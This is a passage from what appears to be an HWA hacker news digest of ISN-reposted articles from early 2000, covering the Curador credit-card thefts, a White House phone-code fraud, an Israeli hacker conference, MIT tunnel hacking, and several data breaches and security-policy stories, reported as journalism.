*-------------------------------------------------* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *-------------------------------------------------* ISN is sponsored by Security-Focus.COM @HWA 234.0 ISN:Curador worked as e-commerce consultant. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.internetnews.com/ec-news/article/0,2171,4_328071,00.html Before he was arrested by police in Wales last Thursday, the online credit card thief who called himself "Curador" worked as an e-commerce consultant, his former boss revealed Monday. As previously reported, an 18-year-old man in Clynderwen, Wales was arrested Thursday in connection with break-ins at nine e-commerce sites in recent weeks. Under U.K. law, Curador's name was not released by police, but the Britain's Daily Telegraph reported Saturday that Curador's real name was Raphael Gray. The true name of his accomplice, who was also arrested, was not disclosed. While he was allegedly breaking into online stores in the United States, Canada, Thailand and Great Britain, Gray was also working to develop an e-commerce strategy for Console King, a mail-order company in Narberth, Wales. According to Sam Lee, managing director, the retailer of video games and DVDs hired Gray around Christmas 1999 on the recommendation of a job recruitment firm. "[Gray] told us that he worked for several companies, including a subsidiary of Microsoft. And he showed us some of the work he had done, and it was pretty good. As far as we knew, he had no criminal record," said Lee. Console King paid Gray about US$6.50 to build the company an online storefront. But Lee said he fired Gray in the beginning of March after Gray began failing to show up for work. Only last week did Lee know that Gray had allegedly been involved in the online theft of about 26,000 credit cards over the course of six weeks. "We couldn't believe it. He's put my company and my staff in jeopardy. He's so stupid he doesn't know what he's done," said Lee, who added that Console King has tightened security at its site since learning of Gray's true identity. Gray has been released on bail and according to Lee has been seen on the streets of Clynderwen, which has a population of 550. FBI officials declined to comment on whether Gray had used any of the stolen card numbers to place fraudulent orders. Britain's Daily Mail newspaper quoted a detective who said police had confiscated "a pile of stuff" from the homes of Gray and his accomplice. Gray also apparently used a card stolen from an online retailer named Albion's MO to register one of the sites where he posted stolen card numbers and diatribes about e-commerce security. According to Robert Koseluk of Carmel, Indiana, he received an unauthorized charge for $198 to register and set up a site at free-creditcard.com. Gray also apparently used a card stolen from Stacy Yaple of Jacksonville, Fla., to register another site, e-crackerce.com. Lee of Console King said that Gray apparently had financial problems. Lee also said Gray would often borrow small amounts of money from him. "He never had any money. I had to lend him money for a haircut and for lunch. He came into work stinking and wore the same clothes everyday. I had to speak with him about his personal appearance and hygiene," said Lee. At his Web sites, Gray has argued that he broke into other sites to shame operators into improving their shoddy security. Tim Ward, owner of feelgoodfalls.com, a site that Curador hit around the end of February, said Curador has had his desired effect. "There's some good that came out of this. We never intended to expose anybody's card numbers, but what he did resulted in us being more secure," said Ward, who revealed that his mother-in-law built the site at feelgoodfalls.com using Microsoft StoreFront. In the wake of the break-in, Ward has hired a security consulting firm to batten down the hatches. Michael Vatis, director of the FBI's National infrastructure protection center, said Friday that regardless of a cracker's motives, breaking into a site is still a federal crime. "If someone gains unauthorized access to a computer that's engaged in interstate or foreign commerce, that access is a federal crime, whether the state of security is poor or excellent," said Vatis. Reuters reported Sunday that one of the credit cards that Curador had stolen belonged to none other than Microsoft Chairman Bill Gates. The report apparently was based on information gleaned from one of Curador's Web sites where he posted stolen credit card numbers. But that site, which is mirrored here, contains information suggesting the Reuters report is inaccurate. For example, the credit card number Curador posted and claimed was Gates' has only 12 digits, and the first four do not match any algorithms used by Visa, Mastercard, Discover, American Express, or any of the other major credit card companies. A spokesperson for the U.S. Secret Service, which investigates credit card fraud, would not comment on Curador's claims, although he did say that the card appeared to be missing numbers. *-------------------------------------------------* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *-------------------------------------------------* ISN is sponsored by Security-Focus.COM @HWA 235.0 ISN:White house official charged with spreading phone codes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://dailynews.yahoo.com/h/nm/20000327/tc/crime_whitehouse_1.html By Gail Appleson, Law Correspondent NEW YORK (Reuters) - A U.S. Army sergeant has been charged with giving out long distance White House telephone access code information that allowed individuals to charge some 9,400 calls worth $50,000 to the federal government, prosecutors said on Monday. David Gilmer, who was assigned to the White House Communications Agency, was arrested late Friday in Virginia on a criminal complaint filed in Manhattan federal court that alleged the calls were made over the last few months. The WHCA provides telephone service to Executive Branch agencies and departments including the President, Vice President, White House Senior Staff, National Security Council, U.S. Secret Service and others as directed by the White House Military Office. AT&T provides the long-distance phone service for the WHCA. No information was immediately available on the identities of those who used the information or if Gilmer made any profits from giving it out. The White House said Gilmer is no longer attached to the Communications Agency but had no further comment on the matter. Prosecutors said those involved in the scheme were able to use the White House code in much the same way consumers use telephone calling cards. However, in this case the WHCA was billed for the calls instead of the users. According to court papers, individuals called a WHCA toll-free number and entered a numerical code. They then heard a dial tone and were able to make long distance calls. AT&T told investigators that about 9,400 unauthorized calls were made between about Dec. 5, 1999, and Feb. 8. Some of these calls were made from phones in New Jersey and New York City. WHCA was billed about $50,000 for the calls. AT&T and Bell Atlantic provided authorities with subscriber information for several of the residential and business telephone lines on which the calls were made and search warrants were obtained for those properties. In searching one of the New Jersey properties, agents said that said one individual admitted using the WHCA toll-free number and code since September 1999. The unidentified individual allegedly told authorities the information came from Gilmer. According to court papers, the individual had Gilmer's business card identifying him as an employee of the WHCA assigned to the Presidential Communications division. On March 17 the individual consented to be taped by federal agents when that individual called Gilmer. The individual asked Gilmer for another WHCA code to avoid being billed for a long distance call. Gilmer allegedly provided the code. The individual made a second taped call on March 22 and during the conversation Gilmer allegedly admitted giving access codes to other individuals. *-------------------------------------------------* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *-------------------------------------------------* ISN is sponsored by Security-Focus.COM @HWA 236.0 ISN:Hackers hold conference in Israel ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.lasvegassun.com/sunbin/stories/tech/2000/mar/30/033000707.html JERUSALEM (AP) [3.30.2000] -- Hackers from around the world overcame interrogations, censorship and an all-around bad image to hold Israel's first hacker convention, wrapping up the two-day conference Thursday without a glitch. The 350-strong gathering was the first of its kind since the Yahoo! and eBay commercial sites were crippled in February, reminding companies across the globe of the dangers hackers can pose. At the request of lawmakers, Israeli police had considered banning the conference, but Attorney General Eliyakim Rubinstein gave the go-ahead. One of the original hackers, John Draper of Fremont, Calif., said the hackers wanted to put a better face on the practice. "A hacker is a person who is developing programs to make them better," Draper told The Associated Press. "They aren't the kind of people who break into computer systems. That's a cracker." Draper, known by the handle "Captain Crunch," helped launch the hacker phenomenon. In 1971, he discovered that a toy whistle from a cereal box reproduced the tone needed to open a free telephone line. Aware of his fame, Israeli security agents at the Los Angeles airport interrogated Draper for an hour, he said, and thoroughly searched his computer equipment before allowing him on the plane. "There were many attempts to silence us on this," organizers said in a summary of the gathering, released on their Web site. Police prevented the organizers from publishing one of the results of the conference: a list of vulnerable Israeli commercial Web sites. To compile the list, participants played "HackTheseSites" with sites offered up by Israeli companies. The site owners were confident no one could thwart them, but they were wrong. When they weren't eating pizza or guzzling soda, the hackers sat bent over their computer screens. They discovered that 28 percent of the Israeli net is vulnerable -- about the same proportion as the rest of the world, according to organizers. Police were invited to attend the conference and even to speak, but they turned down the offer, creating the game "Spot the Fed." Participants were given the challenge of finding plainclothes policemen among them. If a person pointed out as suspicious was in fact a security official, the official was to get an "I am the FED" T-shirt, and the spotter an "I spotted the FED" shirt. But none were found out. Israeli lawmaker and former Science Minister Michael Eitan accepted an invitation to attend. He said that hacker games like those displayed at the conference were meant more to entertain ambitious youngsters than cause harm. "I told them that as long as they all enjoy the freedom of the Internet and don't abuse this freedom, and make the public support police intervention, this will work," Eitan said in a telephone interview. Participants also got to speak to their guru -- convicted cyberbandit Kevin Mitnick -- in a conference call. The 36-year-old American bemoaned the strict probation terms that ban him from using a computer or any hi-tech device. Mitnick was released last year after serving five years in jail for breaking into the computer systems of some of America's biggest companies, including Motorola Inc., Novell Inc. and Sun Microsystems Inc. "He had a lot of sympathy in the room -- we all know not being able to touch a computer is a worse punishment than even being in jail," said Neora Shaul, a Tel Aviv computer programmer who helped coordinate the conference. -- On the Net: Conference organizers at http://www.neora.com John Draper's site at http://www.webcrunchers.com Hackers' site at http://www.y2hack.com *-------------------------------------------------* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *-------------------------------------------------* ISN is sponsored by SecurityFocus.com @HWA 237.0 ISN:Old school MIT stylie "hacking" still makes news? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.boston.com/dailyglobe2/090/metro/_Hackers_skirt_security_in_late_night_MIT_treks+.shtml By David Abel, Globe Correspondent, 3/30/2000 CAMBRIDGE - Like shadows they scurry through the night, dressed in black, armed with head-mounted flashlights, walkie-talkies, ropes, pocketknives, lock -picking tools - and their student ID cards. They call themselves ''hackers.'' But these Massachusetts Institute of Technology students shouldn't be confused with those who sabotage computers. They have a more lofty goal: to bypass locked doors, slide through off-limits shafts and tunnels, and explore the bowels of campus buildings. Most Saturday nights, groups of less than a dozen students seek adventure by searching for anything from the fabled bricked-in shower to the Tomb of the Unknown Ladder. ''It's a lot like rock climbing or caving,'' said Jeremy Brown, 27, a computer science graduate student and veteran hacker. ''For us, it's about interrogating the environment, and learning from it.'' But there's another, less appealing side of hacking: the danger. Last November a student was seriously injured after falling through a roof. Many of the hundreds of hackers are reluctant to talk about their underground pastime. They fear news reports will only push college officials to clamp down. ''You see, the more detail we give,'' Brown said, ''the more we're shooting ourselves in the foot.'' Still, hacking is anything but a secret at MIT. If they haven't done it themselves, almost any student on campus could name a friend who has. In fact, during freshman orientation week every year, upperclassmen take large groups to tour the innards of MIT's infrastructure. But college officials insist that they don't turn a blind eye to what is known as ''roof and tunnel hacking,'' a variation or sometime precursor to another form of hacking: practical jokes. MIT students are famous for inventive pranks that require engineering finesse and are often done to coincide with April Fools' Day, such as placing a replica of a campus police cruiser atop the school's Great Dome. ''We definitely don't encourage it,'' said Lawrence S. Bacow, chancellor of MIT. ''We lock the roofs, we alarm doors, and we have fined students when they're where they shouldn't be. It's certainly not like we say, `Here's a roof; come climb on it.' Far from it.'' With students routinely ignoring ''no entrance'' signs, groping their way through unlit pipe rooms, boiler tunnels, and high-voltage areas meant only for specially trained maintenance crews, safety has long concerned administrators. But the culture of hacking recently has come under increased scrutiny. About 3 a.m. on a Sunday morning in November, an 18-year-old woman plunged 96 feet down a chimney. The freshman from Pennsylvania, whose name MIT won't release, is recovering from major spinal cord injuries after falling off the roof of the Sloan School of Management building. While administrators say the student's injury is the worst hacking accident in memory, they know the college was very close to having a fatality - and they say they're doing everything in their power to stop it. ''One injury is one injury too many,'' Bacow said. ''We took this very seriously. She could have died - easily. She was lucky.'' Even with fines of up to $500 for trespassing, improved locks and alarm systems, and constant admonishing by administrators, MIT hackers are not daunted. If anything, they say, they see the obstacles as a challenge to be overcome. ''A lot of hacking is about creativity, finding a way around a locked door or something,'' said a 22-year-old senior majoring in biology, who used to hack and asked that she not be identified. ''Hackers are generally students who question authority and don't pay attention to rules.'' Yet hackers insist they consider safety paramount. Before taking out novices, usually recently recruited freshmen, they pass out laminated yellow cards titled, ''Hacking Ethics.'' The cards are also used as a way to open doors. The pithy precepts include: ''Don't drink and hack;'' ''Don't hack alone;'' ''Leave no permanent damage;'' ''Be subtle - leave no evidence that you were there;'' and contrarily, ''Don't steal anything, but if you must borrow something, remember to return it - perhaps leave a note saying when it will be returned.'' But risks rise when hackers obey their 11th Commandment: Don't Get Caught. According to ''A Brief Guide to Hacking,'' part of a pamphlet published by MIT's Technology Communication Association and circulated to incoming freshmen, hackers ''shalt honor [the commandment] and keep it wholly.'' After detailing specific evasion tactics - such as, ''always have two ways to run,'' or when fleeing, ''change floors often'' - the guide offers up these alibis if caught: ''Is this the way to Baker House?'' or ''Where's the nearest bathroom?'' Rarely, however, do students get caught in such a bind. According to MIT campus police, fewer than a dozen students a year are cited for hacking. Yet on any given night, as many hackers may be trolling through the Earth, Atmospheric, and Planetary Sciences building or the domes towering above the Infinite Corridor. ''It's a difficult thing to prevent,'' said Anne Glavin, chief of MIT's police force. ''First, this subculture is made up of secret associations, and they're not exactly inviting us in as guest speakers. The other thing is these are some of the brightest students. Staying ahead of them is a challenge. I mean, they are the ones who are going to be building the security systems in the future.'' The phenomenon of students scoping steam tunnels or climbing through air ducts for fun reveals the peculiar environment of grouping some of the nation's smartest science-oriented students, administrators and alumni say. At the elite institution, where many of the students grow up taking pleasure more from solving a quadratic equation than in things like watching Sunday football, students often are eager to craft their own brand of entertainment. Throw in a dollop of curiosity and a bent toward ingenuity and you come up with students interested in hacking, according to Jeff Bigler, the former president of MIT Spelunkers club and now an alumnus who helps chronicle hackers' practical jokes. ''Really, what it comes down to is it's a way to hang out, and beats drinking beer and bad music,'' Bigler said. ''It's just exploring, hanging out together and having fun. It's like an outing club.'' *-------------------------------------------------* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *-------------------------------------------------* @HWA 238.0 ISN:US Census tests security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.fcw.com/fcw/articles/2000/0327/web-1census-03-27-00.asp Census tests security By Judi Hasson 03/27/2000 The Census Bureau has hired a company to try to break into its Internet site and brought in the super-secret National Security Agency to test Census security systems. Census officials said they are certain the data is safe but want to make sure there are no vulnerable spots. "Every day, people are scanning our ports. Its not just our site. Its any site, said J. Gary Doyle, who is responsible for systems integration at the Census Bureau. Among the steps that the Census Bureau has taken to protect the decennial count: * Hiring the technology firm Science Applications International Corp. to try to break into the Census Internet site, where respondents can file online. SAIC began working last week, and there have been no reports of successful entry into the site. * Enlisting NSA to make sure the site is secure. * Erecting firewalls to prevent penetration. Among the precautions: prohibiting e-mail from entering the site unless there is a specific address on it and barring outside computers from dialing up the census computer in the building. * Encrypting all census data from the time it leaves a data scanning center via a secure telephone line until it arrives at the Census computer center in Bowie, Md. * Making three copies of the data and storing it in different vaults. * Providing backup systems at the Bowie computer center, including generators and air conditioners. The Census Bureaus precautions have gotten high marks from security experts inside and outside government "Census is using all of the proper security practices," said Richard Smith, vice president of federal operations at Internet Security Systems Inc. "I would guess the likelihood of someone getting in is small." *-------------------------------------------------* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *-------------------------------------------------* ISN is sponsored by SecurityFocus.com @HWA 239.0 ISN:Visa program targets online fraud ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: darek.milewski@pl.pwcglobal.com Visa program will target online fraud By Rachel Konrad Staff Writer, CNET News.com March 24, 2000, 1:10 p.m. PT URL: http://news.cnet.com/category/0-1007-200-1583717.html Online retailers will soon receive a list of formal recommendations from Visa aimed at helping merchants crack down on fraud. Visa's "best-practices" guide, which will be released within the next several weeks, will be similar to those the credit card giant has created for catalog companies that accept credit cards by mail or telephone without signatures. But the newest guide will target e-commerce companies for the first time, with tips on how to minimize hacker attacks on databases and spot potentially fraudulent orders before products are shipped. "Internet merchants haven't always come out of the old catalog business, and sometimes they have little experience in business," said Dave Richey, vice president for card operations at Visa. "They're often new and often focused on IPOs and other stuff. Communication between merchant and cardholder is key in avoiding misunderstandings." For some e-tailers, Visa's security tips could be considered a case of "better late than never": Credit card fraud has marred several high-profile and relatively established online companies in recent months. Expedia, Microsoft's online travel affiliate, announced earlier this month that it will record a fiscal third-quarter charge of $4 million to $6 million to cover the cost of fraudulent transactions on its Web site. The Bellevue, Wash.-based company said stolen credit cards were used to book travel reservations. In January, nearly 350,000 credit card numbers were stolen from music site CD Universe and posted online. A hacker going by the name "Maxus" claimed to have the numbers and tried to extort $100,000 from the Web site. The focus on credit card fraud coincides with intense scrutiny of e-commerce companies by Wall Street investors, many of whom worry that security breaches could dent revenue. Unlike credit card transactions at brick-and-mortar companies, in which the bank that issued the card is usually liable for fraudulent transactions, online merchants are typically forced to cover the losses. The financial institution that issues a credit card assumes liability in about 75 percent of all fraudulent transactions, according to John Shaughnessy, senior vice president for risk management at Visa. But in "card-not-present" transactions--when transactions happen by mail, telephone or Internet and no signatures are obtained--merchants assume liability for roughly 90 percent of fraudulent transactions. Although it's impossible to quantify how much money online merchants have lost to fraudulent charges, experts say the total as a percent of revenue is anywhere from 1 percent to 30 percent, depending on the retailer and industry. In general, computer and electronics vendors are more at risk for fraud than vendors of less-expensive items, such as books, videos or CDs. "Security is going to be the critical issue," said Ben Sim, an expert on e-commerce for New York-based C.E. Unterberg Towbin. "A lot of these merchants don't understand the implications of fraud, and they're using home-grown solutions that simply don't work. If you're getting someone from Romania ordering $50,000 of books, the fraudulent transaction's not going to happen. But thieves are getting much more sophisticated, and merchants' security systems aren't necessarily getting better." According to an Unterberg Towbin study in 1998, more than 50 percent of disputed (or potentially fraudulent) charges at the Visa European division came from Internet transactions. However, Net transactions represented only 2 percent of the division's total transaction volume. Although many e-commerce executives downplay fraud, their attorneys and accountants don't. "Security breaches that result in access to confidential information could damage our reputation and expose us to a risk of loss or liability," music retailer CDNow stated in a 10K filed with the Securities and Exchange Commission in 1998. "We may be required to make significant expenditures and expend considerable personnel effort to protect against security breaches or remedy problems caused by these breaches. We cannot assure that our security measures will prevent such breaches." Other companies are even more blunt: "We cannot assure you that our security measures will prevent security breaches, and such breaches could expose us to operating losses, litigation and possible liability," read a 10Q filed by Egghead.com last November. Amazon.com stated in a fall 1999 10Q filing: "Computer viruses, physical or electronic break-ins, and similar disruptions could cause system interruptions, delays and loss of critical data and could prevent us from providing services and accepting and fulfilling customer orders. "Although we have developed systems and processes to mitigate fraudulent credit card transactions, failure to prevent such fraud may impact our financial results." Tom Holland, director of fraud detection and prevention for Amazon, said such warnings are worst-case scenarios, not daily concerns. "Amazon's fraud losses in comparison to sales revenues--it's minuscule," Holland said. "I can't tell you the dollar figure. It's large, but as a percentage of sales, it's insignificant." Holland said the company is continually upgrading its security system and cooperating with law enforcement to tackle fraud. Amazon and the sheriff of Fairhope, Ala., just completed a case in which a ring of thieves were using card numbers secured from an online "hack shack" of credit card numbers to buy books. "They'd go to a house for sale, rip down the for-sale sign, and have deliveries go there," Holland said. "They took us for $3,000, but we're getting it all back." Although online credit card fraud can damage retailers, security experts say, Internet transactions are extremely safe for consumers. Consumers whose cards are used fraudulently online rarely are responsible for the bills because they don't sign a receipt. In the physical world, consumers must pay up to $50 of fraudulent transactions if they fail to report a stolen card or carelessly distributed credit card information. "The people who end up eating it are the merchants," said Paul Wasserman, chief executive of Internet shopping portal Ebates.com and a former high-tech crime prosecutor in Silicon Valley. "If you're a merchant exercising due diligence, you're supposed to be off the hook. But the reality is that most of the financial institutions don't let them off." Many e-commerce executives complain of an adversarial relationship with issuing banks. Holland said that often, when Amazon calls banks to verify addresses, the company doesn't get help. "They can be blasé," Holland said of the issuing banks. "The e-commerce companies don't get any respect. We're Rodney Dangerfield." ISN is sponsored by SecurityFocus.com @HWA 240.0 ISN:GAO lists security bargains ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.fcw.com/fcw/articles/2000/0327/web-cheap-03-30-00.asp BY Diane Frank 03/30/2000 Agencies can cut their information systems security risks with low-cost and no-cost solutions, federal experts told Congress Wednesday. The General Accounting Office listed six steps that agencies can take to immediately cut down on their security risks: * Increase security awareness throughout the organization. * Ensure that existing controls are operating effectively. * Ensure that software patches are up-to-date. * Use automated scanning and testing tools to quickly identify vulnerabilities. * Expand the use of best practices throughout the agency. * Ensure that the most common vulnerabilities are addressed. In its security audits of agencies, including the departments of Defense and Veterans Affairs, GAO found that security controls are in place but that those controls are not being used correctly, said Jack Brock, director of governmentwide and defense information systems at the General Accounting Offices Accounting and Information Management Division. "Agencies are spending money for tools, but theyre not using those tools," Brock testified before the House Government Reform Committees Government Management, Information and Technology Subcommittee. "Tools are present, but theyre not turned on, theyre not monitored, youre not sure if theyre working or not." One agency that has incorporated many of GAOs low-cost solutions into its agencywide security policy is NASA, which has made many improvements in security since its GAO audit in 1998, Brock said. The agency has bought commercial off-the-shelf vulnerability analysis and scanning tools, but it is augmenting them with freeware and shareware tools from the Internet. NASA also has developed and distributed a list of its top 50 vulnerabilities and has built those into auditing tools at NASA centers so that they automatically scan for those weaknesses, testified David Nelson, NASAs deputy chief information officer. Related link: Text of GAO's Congressional testimony on Wednesday http://www.gao.gov/new.items/ai00135t.pdf *-------------------------------------------------* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *-------------------------------------------------* ISN is sponsored by SecurityFocus.com @HWA 241.0 ISN:DeBeers leaks customer info ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://news.cnet.com/news/0-1007-200-1639327.html?tag=st.ne.1002.thed.1007-200-16393271007-200-1639327 By Stefanie Olsen Staff Writer, CNET News.com April 4, 2000, 4:45 p.m. PT On the Web, diamonds can be a spammer's best friend. About 35,000 customer email and home addresses were exposed on adiamondisforever.com, an informational site about diamonds sponsored by De Beer's, CNET News.com has learned. Chad Yoshikawa, a Bay Area consultant, stumbled across the security hole today while searching for his home address through a search engine. The results turned up a little more than he bargained for. A Web page he found, pulled from the De Beer-sponsored site, lists the names, phone numbers, home and email addresses of people registered with the site, along with his own. Yoshikawa, who said his wife entered a diamond contest through the site, contacted a site administrator immediately because "it didn't look like they were too on top of things because it was hard to find the privacy policy." Jim Greene, system administrator for hosting company Luminant, replied in the email to Yoshikawa: "We have investigated and fixed the problem with the site. This area is not active on the site any longer." The security breach resembles several related "data spills" from Web sites. Last year, Butterball published the names and addresses of people who signed up to receive recipes via an online newsletter. Nissan also exposed a list of more than 24,000 email addresses of its potential buyers last year. "This kind of occurrence is all too frequent. (But) the De Beer's seems especially troublesome because it suggests access to high-net individuals," said Jason Catlett, president of Junkbusters, an online advocacy group. "Who knows how many people have noticed or downloaded the list before it came to the attention of the media." Catlett said. Greene said Yoshikawa and CNET News.com were the only ones to spot the file. "We have looked into the server logs and see no indications that anyone besides yourself and someone coming from C-Net accessed the files," he wrote. Adiamondisforever.com, which launched in November 1996, is part of The Diamond Information Center (DIC), a marketing service for De Beer's, one of the largest diamond producers and marketers in the world. The site's privacy policy stipulates that the company does not "make available the email addresses of those who access our site to other organizations or companies." *-------------------------------------------------* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *-------------------------------------------------* ISN is sponsored by SecurityFocus.com @HWA 242.0 ISN:Cybersleuths want to hack bill of rights ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/04/05/ED11338.DTL&type=tech_article JAMES P. PINKERTON, Newsday Wednesday, April 5, 2000 2000 San Francisco Chronicle More than ever before, Americans are exercising their unalienable right to life, liberty and the pursuit of capital gains. But what happens when liberty jeopardizes life -- or the Dow Jones average? And what happens when the government jeopardizes liberty? On Tuesday, Sen. Jon Kyl, R-Ariz., convened the Senate Judiciary Subcommittee on Technology, Terrorism and Government Information to make the case for new legislation to protect the nation's ``information infrastructure.'' And so began a familiar Washington ritual: Friendly lawmaker invites friendly bureaucrat to a hearing. Soon, a new law emerges that gives political credit to the lawmaker and a bigger budget to the bureaucrat. Kyl began the show with a declaration that ``denial of service'' hacker attacks on companies such as eBay, Yahoo and CNN should ``serve as a wake-up call about the need to protect our critical computer networks.'' Kyl added that ``the attacks contributed to a 258-point drop in the Dow Jones Industrial Average and halted a string of three days of consecutive record- high closes of the technology-laden Nasdaq Composite Index.'' To deal with this problem, Kyl and Sen. Charles Schumer, D-N.Y., have co-sponsored S. 2092, which would modify the federal government's ``trap and trace'' authority, so that law enforcers would no longer need to obtain a search warrant in every jurisdiction through which a cyber- attack traveled. The first ``witness'' was FBI Director Louis Freeh. After praising Kyl and his legislation, he reminded his audience of how much the FBI was already doing to combat the scourge of cyber-crime. Freeh then used the forum to outline the FBI's entire cyber-agenda, covering everyone from virus-writers and intellectual property thieves to the ``Internet Black Tigers,'' a group ``reportedly affiliated with the Tamil Tigers'' of Sri Lanka. He further noted that unchecked Net-related stock fraud costs investors $1 million an hour. Only two more witnesses came after Freeh. One was Richard D. Pethia, who directs a federally funded cyber-security center within the Software Engineering Institute at Carnegie Mellon University in Pittsburgh. Not surprisingly, Pethia was 100 percent behind the joint Kyl-Freeh effort. The other witness was Harris N. Miller, president of the Information Technology Association of America, a Washington-based trade association. Miller was supportive but ambivalent; his worry seemed to be that high-tech trade secrets would spill into -- and then out of -- Uncle Sam's databases. But the real opposition to the Senate bill wasn't heard from because it wasn't invited to testify. One likely opponent is the Electronic Privacy Information Center, a Washington-based cyber-liberties group. ``This is very much a process being driven by the law-enforcement community,'' lamented Mark Rotenberg, the group's director. Another non-invitee was Solveig Singleton, director of information studies at the Cato Institute, a libertarian think tank in Washington. ``Law enforcement views the Fourth Amendment as the problem,'' she said. That's the piece of the Bill of Rights that protects ``persons, houses, papers and effects against unreasonable searches and seizures'' -- with no mention of e-mail. And so now, Singleton observed, the FBI wants to force manufacturers to ``build surveillance into technology,'' all but eliminating the need for search warrants. The dangers that Kyl and Freeh described are real, but so is the danger of a government's habitually stomping on privacy rights. History proves that basic rights are unalienable only when those who might alienate them are watched *-------------------------------------------------* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *-------------------------------------------------* ISN is sponsored by SecurityFocus.com @HWA 243.0 ISN:Third laptop gets lifted ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.the-sun.co.uk/news/5631664 By JOHN KAY A SENIOR Army officer has had a laptop computer stolen from under his nose - the THIRD theft of sensitive files in a month. The 50,000-a-year (U.K.P.) lieutenant colonel fell victim to an opportunist thief at Heathrow Airport. Military top brass admitted last night the incident was "incredibly embarrassing". And they said that the soldier was facing an internal disciplinary probe. The robbery followed the loss of two security service laptops - one from an MI5 agent at a London Tube station and one from a drunken MI6 officer. After those thefts were revealed exclusively by The Sun, all Government departments were ordered to tighten precautions against crooks out to snatch computers. [...] @HWA 244.0 ISN:Government suck rocks at busting computer criminals ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://news.cnet.com/news/0-1005-200-1648223.html By The Associated Press Special to CNET News.com April 6, 2000, 10:05 a.m. PT STANFORD, Calif.--Threats from cyberterrorists have become almost routine at Oracle, the leading developer of database software. Last month, someone in Sudan tried to blackmail the Redwood Shores, Calif.-based company with a threat to break into its system unless it paid an undisclosed sum of money. A clear case for the FBI? Not at Oracle--or at hundreds of other high-tech victims of Internet cyberstalking. "We've notified them of a couple of threats, but we didn't expect them to take any action," said Bill Maimone, Oracle's vice president of server technologies. "It seems so unlikely that they'd be able to do something." As high-tech executives know, the Justice Department lacks the staff to investigate and prosecute most hackers. Many companies also are reluctant to undergo government scrutiny; they've got too many secrets. As a result, cybercriminals are breaking into or paralyzing Web sites with little fear of retribution, costing the industry hundreds of millions of dollars. At a Stanford University Law School conference on cybercrime yesterday, Attorney General Janet Reno pleaded for greater cooperation between the private and public sectors. "It seems to me that we all have a common goal--to keep the nation's computer network secure, safe and reliable," Reno told the assembled CEOs and prosecutors. Many company leaders were unconvinced. "High-tech businesses know they can't count on the Justice Department to handle their complaints," said John Palafoutas, a senior vice president of the American Electronics Association. "They know they must take care of their own security." For the past four years, the Clinton administration has asked Congress for additional staff to prosecute computer crime. To date, the answer has been a consistent refusal. There was just one cybercrime prosecution for every 50 private industry complaints in 1998, according to the latest Justice Department figures. "We're only able to respond to a limited number of the complaints we receive because we're starved for resources," said Associate Deputy Attorney General John Bentivoglio. While funding for prosecutors remains static, computer crime has quadrupled over the past three years, according to a survey by the FBI and San Francisco's Computer Security Institute. Of the hacking victims--most often corporations and government agencies--75 percent said it cost an average of $1 million per intrusion to investigate, repair and secure their systems. Corporations spent $7.1 billion in 1999 on security to protect themselves against cyberattacks, and the bill could reach $17 billion by 2003, according to Internet analysts at Aberdeen Group in Boston. Hackers know authorities are overwhelmed. Two months have passed with no arrests in the Feb. 8 electronic assault that crippled Web sites at 10 major computer companies, including Silicon Valley powerhouses eBay, Yahoo and E*Trade. eBay, an Internet auction site with more than 4.1 million items up for sale at any given time, fights a constant battle against hacking, fraud and illegal deals. "We only take the most serious matters to the FBI. They investigated a few, but there haven't been any prosecutions," said eBay's general counsel, Robert Chesnut. "If the government is going to come out and vow action in these sorts of cases, they need to provide resources, not just the promises." Companies such as eBay and Oracle rely on the help of private consultants to combat hackers--a decision that also helps keep their problems from being publicized. "Information-sharing is a risky proposition with less than clear benefits," said Harris Miller, president of the Information Technology Association of America. "Companies are understandably reluctant to share sensitive proprietary information about prevention practices, intrusions and actual crimes with either government agencies or competitors." *-------------------------------------------------* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *-------------------------------------------------* ISN is sponsored by SecurityFocus.com @HWA 245.0 CanSecWest/core00 Canadian Security Conf ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Unfortunately its out west and not here (southern Ont/Toronto) its what I was hoping to achieve with the failed CanCon (maybe we'll try it again with better planning this time and like oh I dunno SPONSORS? money sorta helps heh.) anyway 